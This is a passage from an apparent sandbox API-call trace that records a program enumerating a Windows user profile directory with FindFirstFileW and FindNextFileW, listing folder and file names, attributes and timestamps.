ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0141.398] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0141.398] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xea9586c0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xea9586c0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0141.399] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdffc9300, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdffc9300, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0141.399] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0141.399] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0141.399] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0141.399] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0141.400] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe03a76c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe03a76c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0141.400] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0141.775] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe062ee20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe062ee20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0141.776] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0141.777] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0141.777] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0141.777] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0141.777] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe04d81c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe04d81c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0141.777] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe04d81c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe04d81c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0141.778] FindClose (in: hFindFile=0xb7f210 | out: hFindFile=0xb7f210) returned 1 [0141.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed7c) returned 1 [0141.778] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ed88) returned 1 [0141.778] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949edbc) returned 1 [0141.778] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x949e8c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0141.778] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x949e898, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0141.778] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x949eae4 | out: lpFindFileData=0x949eae4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f210 [0141.778] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xea9586c0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xea9586c0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0141.779] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdffc9300, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdffc9300, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xe03a76c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xe03a76c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0141.780] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0141.781] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0141.781] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8f3afd80, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8f3afd80, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0141.781] FindNextFileW (in: hFindFile=0xb7f210, lpFindFileData=0x949eaf4 | out: lpFindFileData=0x949eaf4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x8f389c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, 